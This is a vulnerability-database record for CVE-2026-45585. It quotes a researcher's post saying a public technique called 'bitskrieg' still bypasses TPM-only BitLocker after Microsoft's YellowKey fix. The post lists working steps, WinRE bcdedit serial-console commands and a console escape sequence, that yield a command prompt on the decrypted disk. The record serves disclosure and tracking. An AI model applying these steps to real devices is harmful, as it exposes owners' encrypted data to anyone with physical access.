{"uuid": "8b8990a3-a736-4d7d-beb9-b42f5e8df9fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-45585", "type": "seen", "source": "https://infosec.exchange/users/wdormann/statuses/116699350092887103", "content": "Well, bitskrieg is public.\nWhile Microsoft \"fixed\" YellowKey as CVE-2026-45585 (and by \"fixed\", I mean they have provided manual steps that you can perform if you want to remove autofstx.exe from the WinRE registry BootExecute value), bitskrieg still works on such a system to achieve the same goal.  Though it requires a second computer, or a device that can communicate on a serial port.\n\nBoot into WinRe\nGo to a command prompt, ignoring the prompt to enter a bitlocker recovery key.  (Click Skip this drive)\nEnable the serial port in WinRe:bcdedit /set ems 1bcdedit /set emsport 1\nReboot back into WinRe\nFrom your other computer, connect to the serial port.\nType:cmdesctab-\nEnjoy your cmd.exe prompt (over serial) with a decrypted (assuming it's TPM-only) hard disk.", "creation_timestamp": "2026-06-05T20:19:30.022127Z"}